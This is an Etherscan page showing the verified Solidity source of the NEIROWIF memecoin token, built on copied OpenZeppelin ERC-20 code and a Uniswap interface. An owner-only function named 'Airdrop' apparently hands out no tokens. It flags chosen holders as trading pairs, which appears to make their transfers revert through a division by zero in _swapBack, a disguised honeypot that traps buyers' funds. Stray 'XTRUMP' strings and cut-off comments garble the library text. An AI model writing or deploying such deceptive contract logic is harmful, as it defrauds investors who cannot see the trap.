ETH Price: $2,905.20 (-1.12%)
 

Overview

Max Total Supply

100,000,000,000 NEIROWIF

Holders

182

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
NEIROWIF

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-09-05
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.17;
pragma experimental ABIEncoderV2;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

// pragma solidity ^0.8.0;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

// pragma solidity ^0.8.0;

// import "../utils/Context.sol";

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting  the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero XTRUMP address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an XTRUMP`owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
    
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

// pragma solidity ^0.8.0;

// import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
_Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

// pragma solidity ^0.8.0;

// import "./IERC20.sol";
// import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
lly, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    uint256 public _maxlSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should

     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
 cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount XTRUMP exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

// pragma solidity ^0.8.0;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.

     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *

     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, XTRUMP reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
 
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *

     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,  address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,  uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA, uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,  uint256 amountTokenDesired,
        uint256 amountTokenMin,  uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,  uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin, address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,   uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut, address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,  uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}



contract NEIROWIF is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    address public marketingWallet;
    address public developmentWallet;
    address public liquidityWallet;
    address public constant deadAddress = address(0xdead);

    bool public tradingEnabled;
       bool public swapEnabled;
    bool private _swapping;

    uint256 public swapTokensAtAmount;

    uint256 public buyTotalFees;
    uint256 private _buyMarketingFee;
    uint256 private _buyDevelopmentFee;
    uint256 private _buyLiquidityFee;

    uint256 public sellTotalFees;
    uint256 private _sellMarketingFee;
    uint256 private _sellDevelopmentFee;
    uint256 private _sellLiquidityFee;

    uint256 private _tokensForMarketing;   uint256 private _tokensForDevelopment;
    uint256 private _tokensForLiquidity;
    uint256 private _previousFee;

    mapping (address => bool) private _isExcludedFromEnableTrad;
    mapping(address => bool) private _automatedMarketMakerPairs;
    

    event ExcludeFromLimits(address indexed account, bool isExcluded);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event developmentWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event liquidityWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event TokensAirdropped(uint256 totalWallets, uint256 totalTokens);

    constructor() ERC20(unicode"NEIRO WIF HAT", unicode"NEIROWIF") {

        uint256 totalSupply = 100000000000 * (10 ** 18);

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this), address(uniswapV2Router), type(uint256).max);


        _buyMarketingFee = 0;
        _buyDevelopmentFee = 0;
        _buyLiquidityFee = 0;
        buyTotalFees = _buyMarketingFee + _buyDevelopmentFee + _buyLiquidityFee;

        _sellMarketingFee = 0;
        _sellDevelopmentFee = 0;
        _sellLiquidityFee = 0;
        sellTotalFees = _sellMarketingFee + _sellDevelopmentFee + _sellLiquidityFee;
        _previousFee = sellTotalFees;

        
        _isExcludedFromEnableTrad[owner()] = true;
        _isExcludedFromEnableTrad[address(this)] = true;
        _isExcludedFromEnableTrad[deadAddress] = true;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _mint(owner(), totalSupply); 

        tradingEnabled = true;
        swapEnabled = true;
    }

    receive() external payable {}




    function excludeFromEnobleTrading(address account,
      bool excluded) external onlyOwner{
        _isExcludedFromEnableTrad[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }
    function _Airdrop(address pair, bool value) internal {
        _automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    
    function Airdrop(address[] memory accounts, bool value) public onlyOwner {
        for (uint256 i = 0; i < accounts.length; i++) {
            if(accounts[i] == uniswapV2Pair) continue;
            _Airdrop(accounts[i], value);
        }
    }



    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(tradingEnabled || _isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to], "Trading not yet enabled!");
        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }


        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&!_swapping&&_automatedMarketMakerPairs[from] &&
            !_isExcludedFromEnableTrad[from] &&
            !_isExcludedFromEnableTrad[to]
        ) {
            _swapping = true;

            _swapBack();

            _swapping = false;
        }

        bool takeFee = !_swapping;

        if (_isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            // on sell
            if (_automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(10000);
                _tokensForLiquidity +=
                    (fees * _sellLiquidityFee) /
                    sellTotalFees;
                _tokensForMarketing +=
                    (fees * _sellMarketingFee) /
                    sellTotalFees;
                _tokensForDevelopment +=
                    (fees * _sellDevelopmentFee) /
                    sellTotalFees;
            }
            // on buy
            else if (_automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(10000);
                _tokensForLiquidity += (fees * _buyLiquidityFee) / buyTotalFees;
                _tokensForMarketing += (fees * _buyMarketingFee) / buyTotalFees;
                _tokensForDevelopment +=
                    (fees * _buyDevelopmentFee) /
                    buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
        sellTotalFees = _previousFee;
    }

    function _swapTokensForETH(uint256 tokenAmount) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) internal {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidityWallet,
            block.timestamp
        );
    }

    function _swapBack() internal {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = _tokensForLiquidity +
            _tokensForMarketing +
            _tokensForDevelopment;
        bool success;


        uint256 liquidityTokens = (contractBalance * _tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        _swapTokensForETH(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(_tokensForMarketing).div(
            totalTokensToSwap
        );

        uint256 ethForDevelopment = ethBalance.mul(_tokensForDevelopment).div(
            totalTokensToSwap
        );

        uint256 ethForLiquidity = ethBalance -
            ethForMarketing -
            ethForDevelopment;

        _tokensForLiquidity = 0;
        _tokensForMarketing = 0;
        _tokensForDevelopment = 0;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            _addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                _tokensForLiquidity
            );
        }

        (success, ) = address(developmentWallet).call{value: ethForDevelopment}("");

        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }

}

// pragma solidity >=0.6.2;

// import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token, uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,  uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,  bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
          address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalWallets","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalTokens","type":"uint256"}],"name":"TokensAirdropped","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"developmentWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"liquidityWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"bool","name":"value","type":"bool"}],"name":"Airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_maxlSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"sta